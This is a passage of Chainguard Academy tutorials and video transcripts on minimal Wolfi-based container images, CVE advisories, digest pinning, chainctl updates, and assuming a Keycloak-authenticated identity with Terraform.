up-to-date. So when an upstream project does a release we’ll grab that immediately and typically have a new Wolfi package ready in four hours and a new container image shortly after. And if there’s one piece of advice I would give teams to avoid issues it’s keep your software and dependencies up-to-date. It really is the best way to avoid getting hit by known vulnerabilities. It is a lot of work as things tend to break when you update things but it really is necessary work. Between them those two points handle most cases. But there is a third thing we do and it’s a bit more specific to us and that is we issue security advisories. Now a security advisory is basically a YAML file that gets picked up by scanners and provides them with more information on specific vulnerabilities. So if we go back and look at some of the CVEs reported by Grype we see some specific to flux up here. For example CVE-2024-24783 through to CVE-2024-24786. So what we can do is we can go to the advisory website on Wolfi for flux and see what it says about those CVEs. Okay so I’m on the advisories github project for wolfi-dev and we’re looking at the flux advisories. And what we see here is we’ve got an advisory for CVE-2023-39325 and what we’re saying is we fixed that CVE and it’s been fixed since package 2.1.2-r1. So we might have pulled in a patch or we might have updated a release etc. Got a very similar one here. I think this was Rapid Reset by the way. Here’s another interesting one. 
This time we’re saying this CVE-2023-45283 is a false positive because this vulnerability only affects windows and this is a Linux package. Same with this one and if we scroll down a bit we should get to, yeah, these are the CVEs that we saw in the output earlier and you can see when they’ve been fixed and which version they’ve been fixed in. Aliases, so the CVE also goes by the github security advisory with this code. And here we got an example of us picking up so we became aware that Grype had detected a vulnerability in one of our container images on the 14th of March and we fixed it on the 16th of March and this is the version that it was fixed in. This information is picked up by scanners and used to filter out the results so they’re more accurate. Okay so that’s about it. To recap the three things we do are one keep our container images small, two keep our packages up-to-date and three when we have to we issue security advisories. Hope that was helpful please let me know if you have any questions. --- ### Using the Chainguard Static Base Container Image URL: https://edu.chainguard.dev/chainguard/chainguard-images/how-to-use/static-base-image/ Last Modified: August 30, 2023 Tags: Chainguard Containers, Product, Video Tools used in this video Docker Grype Dockerfile
FROM cgr.dev/chainguard/go AS build
COPY main.go /main.go
RUN CGO_ENABLED=0 go build -o /hello /main.go
FROM cgr.dev/chainguard/static
COPY --from=build /hello /usr/local/bin/
CMD ["hello"]
Transcript So what’s the best container base image to use? 0:10 Well, there’s plenty of choices but if everything else is equal, I would choose something very small and with a low known-vulnerability count, and an excellent example of this is a Chainguard static image. 0:25 So some of you are probably familiar with the Google Distroless images and the Chainguard static image is very similar. 0:33 So as some background, these images all came from a quest to produce the most minimal secure container images possible. 0:42 The idea is that the less there is in a container image, it’s not just easier to transfer, but it’s also less complex and more secure. 0:52 And this is borne out by just comparing common base images and the sizes and CVE count. 0:58 For example, let’s take a look at the Debian image. 1:01 And we can see that’s around 140 megabytes in size. 1:08 We can compare that to Alpine. 1:11 And Alpine is only 7.6 megabytes. 1:15 And then if we look at the Google distroless image that’s even smaller still at 2.45 megabytes and the Chainguard static images are roughly the same around two or three megabytes. 1:33 The reason there’s two images here is the latest glibc one is Wolfi based and the latest one is Alpine based, but they’re both practically identical to be honest. 1:46 So next, let’s scan the images for CVEs. 1:50 I’m going to use grype in this case, which is a common scanner and it’s free to use so you can recreate these results. 1:58 So if we look at Debian, Debian does have some vulnerabilities and we can see grype thinks there’s one high, three low and 47 negligible vulnerabilities in this case. 2:13 If we run on Alpine however, grype says there’s no vulnerabilities. 2:29 We run it on Google Distroless. 2:32 It’s the same story and also on the Chainguard static images, there’s zero vulnerabilities. 2:45 So simply by having less in an image, we have a stronger security posture because there’s less attack surface. 2:53 The distroless and Chainguard images take this to an extreme by not even having a shell or package manager in them.
3:01 But if you don’t have a shell or a package manager, how can you do anything with the image? 3:07 And the answer is to use a multistage build. 3:10 So I have an example here, the Dockerfile and you can see it builds a simple go program and copies the result into the Chainguard static image, we can build this with “docker build” and we can see it works. 3:36 But the best thing is, if you look at the size of the image, it’s tiny, it’s only 3.93 megabytes. 3:49 Now there is one final point. 3:52 Some of you are probably thinking we can actually make this even smaller by using the empty scratch image. 3:58 In this case, you’d be right. 4:01 But in a lot of other cases, what you’ll find is that applications require one or two things more. 4:07 For example time zone data or TLS certificates. 4:12 And they often expect certain directories to be available such as /tmp or /etc or /home. 4:19 So the static image provides this and almost nothing else. 4:23 For that reason, if you’re using a tool chain that lets you build statically compiled binaries like rust or go and you want a secure and minimal base. 4:33 It’s really hard to do better than the Chainguard static image. --- ### Getting Started with the nginx Chainguard Container URL: https://edu.chainguard.dev/chainguard/chainguard-images/getting-started/nginx/ Last Modified: March 21, 2025 Tags: Chainguard Containers, Product The nginx container images maintained by Chainguard include development and production distroless images that are suitable for building and running nginx workloads. Container images tagged with :latest-dev include additional packages to facilitate project development and testing. Container images tagged with :latest strip back these extra packages to provide a secure, production-ready container image. In this tutorial, we will create a local demo website using nginx to serve static HTML content to a local port on your machine. Then we will use the nginx Chainguard Container to build and execute the demo in a lightweight containerized environment. If you’d like, you can watch our Getting Started with the nginx Chainguard Container video as you work through this tutorial, which will walk through the same steps that are detailed here. What is distroless Distroless container images are minimalist container images containing only essential software required to build or execute an application. That means no package manager, no shell, and no bloat from software that only makes sense on bare metal servers. What is Wolfi Wolfi is a community Linux undistro created specifically for containers. This brings distroless to a new level, including additional features targeted at securing the software supply chain of your application environment: comprehensive SBOMs, signatures, daily updates, and timely CVE fixes. Chainguard Images Chainguard Containers are a mix of distroless and development container images based on Wolfi. Daily builds make sure images are up-to-date with the latest package versions and patches from upstream Wolfi. Prerequisites You will need to have nginx and Docker Engine installed on your machine to follow along with this demonstration. For this tutorial, you will be copying code to files you create locally. You can find the demo code throughout this tutorial, or you can find the complete demo at the demo GitHub repository. Step 1: Setting up a Demo Website We’ll start by serving static content to a local web server with nginx. With nginx installed, create a directory for your demo. 
In this guide we’ll call the directory nginxdemo: mkdir ~/nginxdemo/ && cd $_ Within this directory, we will create a data directory to contain our content to be hosted by the web server. mkdir data && cd $_ Using a text editor of your choice, create a new file index.html for the HTML content that will be served. We will use nano as an example. nano index.html The following HTML file displays a graphic of Linky alongside a fun octopus fact. <!DOCTYPE html> <html> <head> <title>Chainguard nginx Demo Website</title> <link rel="stylesheet" href="stylesheet.css"> </head> <body> <h1>nginx Demo Website</h1> <h2>from the <a href="https://edu.chainguard.dev/" target="_blank">Chainguard Academy</a></h2> <img src="linky.png" class="corners" width="250px"> <i><h3>Did you know?</h3></i> <p>The Wolfi octopus is the world's smallest octopus, weighing in on average at less than a gram!</p> <p>They are found near the coastlines of the west Pacific Ocean.</p> </body> </html> Copy this code to your index.html file, save, and close it. Next, create a CSS file named stylesheet.css using the text editor of your choice. We’ll use nano to demonstrate. nano stylesheet.css Copy the following code to your stylesheet.css file. /* Chainguard Academy nginx Demo Website */ body { text-align: center; background-color: #fcebfc; font-family: Arial, sans-serif; } h1 { color: #df45e6; } h2, h3 { color: #9745e6; } p { color: #583ce8 } .corners { border-radius: 10px; } After copying the code into the stylesheet.css file, save and close it. Next, you will pull down the linky.png file using curl. Always inspect the URL before downloading it to ensure it comes from a safe and trustworthy location. curl -O https://raw.githubusercontent.com/chainguard-dev/edu-images-demos/fb54a9767a5474716398ac33de81d66e263d4c6f/nginx/data/linky.png Now, return to the nginxdemo directory you made earlier. cd ../ Here we will create the nginx.conf configuration file used by nginx to run the local web server. We will demonstrate this using nano. nano nginx.conf Copy the following code into the configuration file you created. In the location directive, be sure to update the configuration to reference the path from root to the data directory you created in a previous step. The file path which you are not using should be commented out using the # symbol to prevent syntax errors. worker_processes 1; events { worker_connections 1024; } http { include mime.types; default_type application/octet-stream; sendfile on; keepalive_timeout 65; server { listen 8080; server_name localhost; charset koi8-r; location / { root /Users/username/nginxdemo/data; # Update the file path for your system #root /home/username/nginxdemo/data; # Linux file path example } } include servers/*; } Once you are finished editing the configuration file, save and close it. Create a new file named mime.types using a text editor of your choice. We will use nano to demonstrate. nano mime.types Copy and paste the following code into your mime.types file. This file will allow nginx to handle the HTML, CSS, and png files we created when rendering the webserver. types { text/html html htm shtml; text/css css; image/png png; } Save and close the mime.types file when you are finished editing it. Next, copy the absolute filepath to the nginx.conf file you created earlier. 
Replacing the example path with this copied path, execute the following command to initialize the nginx server: nginx -c /Users/username/nginxdemo/nginx.conf Please note that you may encounter some permissions errors when executing this command. You will need to update the permissions of the default nginx logging directory on some systems to proceed. For example, nginx installed with Homebrew stores its log files at /opt/homebrew/var/log/nginx/, while on a Linux machine, the logs are stored in /var/log/nginx/. To update the permissions of these directories, execute the following command, updating the log file path if need be. chmod +wx /opt/homebrew/var/log/nginx/ With the directory permissions updated, you should now be able to initialize the nginx server. To view the HTML content, navigate to localhost:8080 in your web browser of choice. You will see a simple landing page with a picture of Linky and a fun fact about the Wolfi octopus. If you make any changes to the files nginx is serving, run nginx -s reload in your terminal to allow the changes to render. When you are finished with your website, run nginx -s quit to allow nginx to safely shut down. Step 2: Creating the Dockerfile We will now use a Dockerfile to build an image containing the demo. In the nginxdemo directory, create the Dockerfile with the text editor of your choice. We will use nano: nano Dockerfile The following Dockerfile will: Start a new build based on the cgr.dev/chainguard/nginx:latest container image; Note which container port we need to expose for nginx to listen on; Copy the HTML content from the data directory into the image. Copy this content to your own Dockerfile:
FROM cgr.dev/chainguard/nginx:latest
EXPOSE 8080
COPY data /usr/share/nginx/html/
Save the file when you’re finished. You can now build the container image with: docker build . --pull -t nginx-demo Once the build is complete, run the container image with: docker run -d --name nginxcontainer -p 8080:8080 nginx-demo The -d flag configures our container to run as a background process. The --name flag will name our container nginxcontainer, making it easy to identify from other containers. The -p flag publishes the port that the container listens on to a port on your local machine. This allows us to navigate to localhost:8080 in a web browser of our choice to view the HTML content served by the container. You should see the same HTML page as before, with Linky and an octopus fun fact. If you wish to publish to a different port on your machine, such as 1313, you can do so by altering the command-line argument as shown: docker run -d --name nginxcontainer -p 1313:8080 nginx-demo When you are done with your container, you can stop it with the following command: docker container stop nginxcontainer Advanced Usage In this demo, we did not copy the configuration file into the container image built from the Dockerfile. This is because the default configuration file in the image was sufficient for the scope of this demo. If you wish to use a custom configuration file, you must ensure that file paths, ports, and other system-specific settings are configured to match the container environment. You can find more information about making these changes at the Chainguard nginx Container Overview. If your project requires a more specific set of packages that aren't included within the general-purpose nginx Chainguard Container, you'll first need to check if the package you want is already available on the wolfi-os repository.
Note: If you're building on top of a container image other than the wolfi-base container image, the image will run as a non-root user. Because of this, if you need to install packages with apk, you need to use the USER root directive. If the package is available, you can use the wolfi-base image in a Dockerfile and install what you need with apk, then use the resulting image as base for your app. Check the "Using the wolfi-base Container" section of our images quickstart guide for more information. If the packages you need are not available, you can build your own apks using melange. Please refer to this guide for more information. --- ### How to Use Container Image Digests to Improve Reproducibility URL: https://edu.chainguard.dev/chainguard/chainguard-images/how-to-use/container-image-digests/ Last Modified: April 8, 2025 Tags: Chainguard Containers, Product, Video Tools used in this video Docker Crane Commands used docker pull cgr.dev/chainguard/node docker manifest inspect cgr.dev/chainguard/node@sha256:ede7ef4ca485553f5313f7a02ad3537db1fe337079fc7cfb879f44cf709326db crane digest --full-ref cgr.dev/chainguard/node docker pull cgr.dev/chainguard/node:latest@sha256:ede7ef4ca485553f5313f7a02ad3537db1fe337079fc7cfb879f44cf709326db Dockerfile
FROM cgr.dev/chainguard/go:latest@sha256:7e60584b9ae1eec6ddc6bc72161f4712bcca066d5b1f511d740bcc0f65b05949 AS build
WORKDIR /src
RUN CGO_ENABLED=0 go build -o /bin/server ./src
FROM cgr.dev/chainguard/static AS prod
COPY --from=build /bin/server /bin/
EXPOSE 8000
ENTRYPOINT [ "/bin/server" ]
Transcript 0:05 You might have heard the advice to pin to a digest when using container images. 0:10 But what does this mean? 0:11 Why is it useful and how can you do it? 0:15 So a digest is a content based hash of a unique container image. 0:19 No two container images can have the same digest. 0:23 If you pull an image by the digest, you are guaranteed to get exactly the same image each time. 0:30 And this contrasts with tags like latest or 3.0 which are continually updated and changed. 0:37 So you run pull twice, you might well get a different image. 0:41 And this has implications for reproducibility. 0:46 If images are changing how can I be sure if it works for me it will work for anybody else or myself in the future? 0:52 So what’s the easiest way to get the digest of an image? 0:56 You can run Docker pull and grab it directly from there, for example. 1:02 And you can see the digest right here, but do note that this digest will refer to the index of the image which will list different images for different platforms. 1:15 And most likely this is what you want. 1:18 But we can see what I mean by using the Docker manifest inspect tool. 1:28 And we’ll use this digest and we’ll pipe it through jq. 1:40 And so note that this is the index of the image and it actually lists two more digests that point to actual platform specific images. 1:48 In this case, the arm64 image and the amd64 image. 1:54 If you wanted the image for a specific platform, you could use the address listed here, but note that that might break for some people. 2:02 So make sure you know what you’re doing before using that. 2:06 And I should also mention the crane tool which is a little bit easier to use in scripts as you don’t have to parse the output. If I can spell. 2:16 There we go. 2:18 So here I’ve run crane digest. 2:20 I’ve asked for the full reference which makes it output the beginning part again. 2:24 So we got the digest for the node image as a single line in output.
2:29 And you can also pass a `–platform`` argument which will return the digest for specific platform. 2:38 So I could ask for the arm64 platform and get this digest back. 2:42 OK. 2:43 So now that we have the digest, how can we use it? 2:46 Well, the most obvious way is to just do a Docker pull. 2:53 So here we’ve done a docker pull on node:latest, using this above digest and that works. 3:01 We get back exactly the same image. 3:03 One of the interesting things there and you might have noticed as I went backwards from history is that we can change this tag here. 3:10 It doesn’t, and it turns out Docker or Docker Hub and registries don’t actually care what this tag is when you specify an digest - that part gets ignored. 3:21 So we can put anything at all there and you can use it for metadata. 3:26 But where you’re most likely to use a digest is in the configuration file like a Dockerfile, a compose file or Kubernetes yaml file. 3:35 So I have an example here using the Dockerfile here. 3:39 We’ve pinned the version of the Go compiler. 3:43 And what that means is every time I run the docker build, I’ll be using exactly the same Go compiler. 3:50 So I’m absolutely sure that nothing’s changed in the Go compiler that might cause this build to fail. 3:56 And by using digest in Dockerfiles, we make the whole process much more reproducible; things won’t break because the underlying image has changed in this case. 4:08 And that’s really about it. 4:09 We’ve looked at what our digest is, how you can get it and how you can use it to improve reproducibility. --- ### Find and Update Your chainctl Release Version URL: https://edu.chainguard.dev/chainguard/chainctl-usage/chainctl-version-update/ Last Modified: March 6, 2025 Tags: chainctl, version, update, Product This page shows you how to check which release version of chainctl you have installed and how to update to the latest release. For a full reference of all commands with details and switches, see chainctl Reference. View your chainctl version To see which chainctl version you have installed, use: chainctl version This command tells you more than just a release number. ▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄ ____ _ _ _ ___ _ _ ____ _____ _ / ___| | | | | / \ |_ _| | \ | | / ___| |_ _| | | | | | |_| | / _ \ | | | \| | | | | | | | | |___ | _ | / ___ \ | | | |\ | | |___ | | | |___ \____| |_| |_| /_/ \_\ |___| |_| \_| \____| |_| |_____| chainctl: Chainguard Control GitVersion: v0.2.66 GitCommit: cb0ff7f1806341b20fd72be4769668a1985ed845 GitTreeState: clean BuildDate: 2025-04-09T07:49:51Z GoVersion: go1.24.1 Compiler: gc Platform: linux/amd64 Update your chainctl install To update your chainctl installation to the latest release, use: chainctl update This will present the following: Current version v0.2.66 Latest version 0.2.73 Download URL https://dl.enforce.dev/chainctl/latest/chainctl_linux_x86_64 chainctl filepath /usr/local/bin/chainctl Cache /root/.cache/chainctl Operating System linux Architecture x86_64 Do you want to continue? [Y,n]: Enter Y to proceed and the upgrade will continue and confirm like this: ✔ Download complete! 
Backing up current chainctl (/usr/local/bin/chainctl) Updating chainctl... Update complete! ⛓ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄ ____ _ _ _ ___ _ _ ____ _____ _ / ___| | | | | / \ |_ _| | \ | | / ___| |_ _| | | | | | |_| | / _ \ | | | \| | | | | | | | | |___ | _ | / ___ \ | | | |\ | | |___ | | | |___ \____| |_| |_| /_/ \_\ |___| |_| \_| \____| |_| |_____| chainctl: Chainguard Control GitVersion: v0.2.73 GitCommit: bd6a3e9901c85801697599d72e2646a862570cde GitTreeState: clean BuildDate: 2025-04-22T17:27:55Z GoVersion: go1.24.2 Compiler: gc Platform: linux/amd64 Temporary files may need to be removed manually: rm -f /root/.cache/chainctl/chainctl.bak --- ### Reproducible Dockerfiles with Frizbee and Digestabot URL: https://edu.chainguard.dev/chainguard/chainguard-images/how-to-use/digestabot_frizbee/ Last Modified: June 7, 2024 Tags: Chainguard Containers, Product, Video Tools Frizbee Digestabot Transcript I’d like to talk about a problem I faced with container builds in the past and a potential solution. So basically, the problem is you rerun your Docker build, or you reapply your Kubernetes YAML, and it no longer works, even though it was perfectly fine the last time. And it’s because the images your configuration is pointing to have changed, i.e. you’re now pulling different versions of the images. Now, I hit this most when I come back to a project after a few months, but it can really happen at any point. Now, let’s take a look at an example so we can really understand what I’m talking about. OK, so I have a Dockerfile here, and at the moment, it’s broken. It does build, but if I run it, we get an error. And the reason is that the version of Python has changed since it was first built. So if we look at the Dockerfile, we can see it’s a multi-stage build, where the build step is using this latest-dev tag. So that’s a completely up-to-date image with build tool inside it. But the runtime part uses this Python tag, Python latest at a specific digest, which in this case refers to an image from a few months ago. Now, if we change this to use the current latest, rebuild it, and run it, it does work. But because both images are the latest versions, they can change at any point and break again. And if someone else runs this build, there’s no guarantee that it’s going to work. What we should really do is pin both images to digests that we know will work together. And to demonstrate that, I’m going to use this frizbee tool from StackLock. So if I run frizbee on an image, it will go to the registry and ask for the current digest for a tag and update the Dockerfile with the new tag. So if I run frizbee image -n to say dry run, and then Dockerfile, which is the file we’re interested in, we can see what it’s done here. And our latest-dev now has this SHA hash, which is the current SHA hash of the latest-dev image. And our Python latest has changed to this SHA hash. So that’s perfect. You know these two images will work together. And we can output this and build it again. And this should run. Let’s just call it the same thing. Yes. OK. So now I have a Dockerfile with exact image versions that I know will work. 
But even better, the Python dependencies are specified in this requirements.txt file. And they have exact versions. So I’m actually pretty confident that if I come back to this build in, say, a year’s time, it’s still going to work, with the assumption that the images and the packages are still available to be downloaded. Now, you don’t want to be running versions of software that are a year out of date in production, obviously, as you’re going to find you’re missing important security updates, and your scanners, and maybe even your security team are going to start shouting at you. So you need to update and test your Dockerfile periodically. Now, you can script a solution with Frizbee, but there’s also Digestabot from Chainguard. So Digestabot is a GitHub action that will run regularly and open a PR to update your image references if it finds they’re out of date. What both of these options give you is a high level of reproducibility, along with a simple update mechanism that gives you control over how and when changes are applied. So please take a look at Frizbee and at Digestabot, and let me know how you get on. --- ### Create an Assumable Identity for a CLI session authenticated with Keycloak URL: https://edu.chainguard.dev/chainguard/administration/assumable-ids/identity-examples/keycloak-identity/ Last Modified: May 9, 2024 Tags: Chainguard Containers, Product, Procedural Chainguard’s assumable identities are identities that can be assumed by external applications or workflows in order to perform certain tasks that would otherwise have to be done by a human. This procedural tutorial outlines how to create an identity using Terraform, and then assume the identity with the CLI to interact with Chainguard resources. Prerequisites To complete this guide, you will need the following. terraform installed on your local machine. Terraform is an open-source Infrastructure as Code tool which this guide will use to create various cloud resources. Follow the official Terraform documentation for instructions on installing the tool. chainctl — the Chainguard command line interface tool — installed on your local machine. Follow our guide on How to Install chainctl to set this up. A Keycloak deployment. Keycloak is an Open Source identity provider which Chainguard provides as an image Creating Terraform Files We will be using Terraform to create an identity for a Keycloak user to assume. This step outlines how to create three Terraform configuration files that, together, will produce such an identity. To help explain each configuration file’s purpose, we will go over what they do and how to create each file one by one. First, though, create a directory to hold the Terraform configuration and navigate into it. mkdir ~/keycloak-id && cd $_ This will help make it easier to clean up your system at the end of this guide. main.tf The first file, which we will call main.tf, will serve as the scaffolding for our Terraform infrastructure. The file will consist of the following content. terraform { required_providers { chainguard = { source = "chainguard-dev/chainguard" } } } This is a fairly barebones Terraform configuration file, but we will define the rest of the resources in the other two files. In main.tf, we declare and initialize the Chainguard Terraform provider. Next, you can create the sample.tf file. sample.tf sample.tf will create a couple of structures that will help us test out the identity in a workflow. This Terraform configuration consists of two main parts. 
The first part of the file will contain the following lines. data "chainguard_group" "group" { name = "my-customer.biz" } This section looks up a Chainguard IAM organization named my-customer.biz. This organization will contain the identity — which will be created by the keycloak.tf file — to access when we test it out later on. If you aren’t sure of the name of your organization, you can retrieve a list of available organizations with the following command. chainctl iam organizations list -o table Now you can move on to creating the last of our Terraform configuration files, keycloak.tf. keycloak.tf The keycloak.tf file is what will actually create the identity for your CLI to assume. The file will consist of four sections, which we’ll go over one by one. The first section creates the identity itself. resource "chainguard_identity" "keycloak" { parent_id = data.chainguard_group.group.id name = "keycloak" description = <<EOF This is an identity that authorizes Keycloak in this repository to assume to interact with chainctl. EOF claim_match { issuer = "https://<keycloak issuer>" subject = "<keycloak user ID>" audience = "<keycloak audience>" } } First this section creates a Chainguard Identity tied to the chainguard_group looked up in the sample.tf file. The identity is named keycloak and has a brief description. The most important part of this section is the claim_match. When the the user tries to assume this identity later on, it must present a token matching the issuer, subject, and audience specified here in order to do so. The issuer is the entity that creates the token, the subject is the entity that the token represents (here, the Keycloak user), and the audience is the intended recipient of the token. In this case, the issuer field points to the realm you are using on your Keycloak server, the issuer of JWT tokens. The audience field will likely be account depending on your Keycloak setup. To discover the issuer, audience, and subject you will need to authenticate with the Keycloak server from the CLI and decode the JWT token returned. There are many ways to authenticate, but here is one example with password authentication: curl --data "grant_type=password&client_id=<client name>&client_secret=<client secret>&username=<user>&password=<password>" https://<DNS NAME>/realms/<realm>/protocol/openid-connect/token | jq -r .access_token | cut -d\. -f2 | sed 's/$/==/' | base64 -d | jq | jq .iss,.aud,.sub The next section of the keycloak.tf file will output the new identity’s id value. This is a unique value that represents the identity itself. output "keycloak-identity" { value = chainguard_identity.keycloak.id } The section after that looks up the viewer role. data "chainguard_role" "viewer" { name = "viewer" } The final section grants this role to the identity. resource "chainguard_rolebinding" "view-stuff" { identity = chainguard_identity.keycloak.id group = data.chainguard_group.group.id role = data.chainguard_role.viewer.items[0].id } Following that, your Terraform configuration will be ready. Now you can run a few terraform commands to create the resources defined in your .tf files. Creating Your Resources First, run terraform init to initialize Terraform’s working directory. terraform init Then run terraform plan. This will produce a speculative execution plan that outlines what steps Terraform will take to create the resources defined in the files you set up in the last section. terraform plan Then apply the configuration. 
terraform apply Before going through with applying the Terraform configuration, this command will prompt you to confirm that you want it to do so. Enter yes to apply the configuration. ... Plan: 4 to add, 0 to change, 0 to destroy. Changes to Outputs: + keycloak-identity = (known after apply) Do you want to perform these actions? Terraform will perform the actions described above. Only 'yes' will be accepted to approve. Enter a value: After typing yes and pressing ENTER, the command will complete and will output a keycloak-ci value. ... Apply complete! Resources: 4 added, 0 changed, 0 destroyed. Outputs: keycloak-identity = "<your actions identity>" This is the identity’s UIDP (unique identity path), which you configured the keycloak.tf file to emit in the previous section. Note this value down, as you’ll need it to authenticate with chainctl. If you need to retrieve this UIDP later on, though, you can always run the following chainctl command to obtain a list of the UIDPs of all your existing identities. chainctl iam identities ls Note that you may receive a PermissionDenied error part way through the apply step. If so, run chainctl auth login once more, and then terraform apply again to resume creating the identity and resources. Testing the identity From a CLI with the chainctl binary installed and access to the Keycloak server: First, create a pair of environment variables for when you log into Chainguard using the identity. This command generates a JSON Web Token (JWT) by logging in to Keycloak with a username and password and then assigning the token to a variable named ID_TOKEN. export ID_TOKEN=$(curl \ --data "grant_type=password&client_id=<client>&client_secret=<client secret>&username=<user>&password=<password>" \ https://<keycloak URL>/realms/<realm>/protocol/openid-connect/token | jq -r .access_token) Next set a variable named ID to your identity’s UIDP value with the following command. Be sure to replace <identity UIDP> with the identity’s UIDP value, which you noted down in the previous section. export ID=<identity UIDP> After creating these variables, run the following commands to log in to Chainguard under the assumed identity. chainctl auth login \ --identity-token $ID_TOKEN \ --identity $ID chainctl auth configure-docker \ --identity-token $ID_TOKEN \ --identity $ID After logging in, the pipeline will be able to run any chainctl command under the assumed identity. To test out this ability, this configuration runs the chainctl images repos list command to list all available image repositories associated associated with the organization. chainctl images repos list After updating the Keycloak configuration, commit the changes and the pipeline will run automatically. A status box in the dashboard will let you know whether the pipeline runs successfully. If the token times out, chainctl will try to reauthenticate and fail. If you repeat the same login command with the old token you will see messages like this: chainctl auth login --identity-token $ID_TOKEN --identity $ID Error: [101] unable to exchange tokens: rpc error: code = PermissionDenied desc = verifying token: oidc: token is expired (Token Expiry: 2024-03-18 11:44:35 +0000 UTC) To authenticate with chainctl you will need to generate a new token with Keycloak. If you’d like to experiment further with this identity and what the workflow can do with it, there are a few parts of this setup that you can tweak. 
For instance, if you’d like to give this identity different permissions you can change the role data source to the role you would like to grant. data "chainguard_roles" "editor" { name = "editor" } To retrieve a list of all the available roles, you can run the following command. chainctl iam roles list This command’s output will also include any custom roles you are able to grant. Removing Sample Resources To remove the resources Terraform created, you can run the terraform destroy command. terraform destroy This will destroy identity and the role-binding created in this guide. It will not delete the organization. You can then remove the working directory to clean up your system. rm -r ~/keycloak-id/ Following that, all of the example resources created in this guide will be removed from your system. Learn more For more information about how assumable identities work in Chainguard, check out our conceptual overview of assumable identities. Additionally, the Terraform documentation includes a section on recommended best practices which you can refer to if you’d like to build on this Terraform configuration for a production environment. For more information about OIDC you can find a lot of documentation on the OpenID Foundation website. For Keycloak specific information, we encourage you to check out the official Keycloak documentation --- ### Getting Software Versions from Chainguard Containers URL: https://edu.chainguard.dev/chainguard/chainguard-images/how-to-use/version-info-chainguard-images/ Last Modified: July 10, 2023 Tags: Chainguard Containers, Product, Video Tools used in this video Docker Cosign Commands used cosign download attestation --platform=linux/amd64 \ --predicate-type=https://spdx.dev/Document \ cgr.dev/chainguard/python:latest | jq -r .payload | base64 -d \ | jq -r '.predicate.packages[] | "\(.name) \(.versionInfo)"' docker run cgr.dev/chainguard/wolfi-base ls /var/lib/db/sbom Transcript Hi, I want to record a very short video on how to get software version information out of Chainguard Containers. 0:14 This is particularly useful if you’re using the public tier of Chainguard Containers and only have access to the latest tag and it can be difficult to ascertain the version that this refers to. 0:25 So all Chainguard Containers have an SBOM or Software Bill Of Materials associated with them. 0:31 This is a complex and long document, but we can parse it to extract just the info we are interested in. 0:38 Now the SBOM is stored as an attestation in the container registry. 0:42 And also in the image itself, we can download the SBOM from the registry by using the Cosign tool. 0:50 And let’s look at an example of this. 0:53 So we have this script here. 0:57 And what the script is going to do is download the Linux amd64 version of Python — it’s not going to get the image itself, but it’s actually going to ask for this predicate type which is SPDX, which corresponds to the SBOM type — SPDX is an SBOM standard. 1:18 And once we have that, we’re going to pass it through jq and base64 to decode it. 1:24 And then we’re going to do a little bit more jq to extract the name and version info for each package. 1:33 So let’s see that in action. 1:40 So down at the bottom here, we see the version information for Python, which is the main package we’re interested in and we can see its version 3.11.4-r0. 1:53 But there’s also full information on all the other packages and the image. 1:58 So you can see things like the version of glibc and readline, etc. 
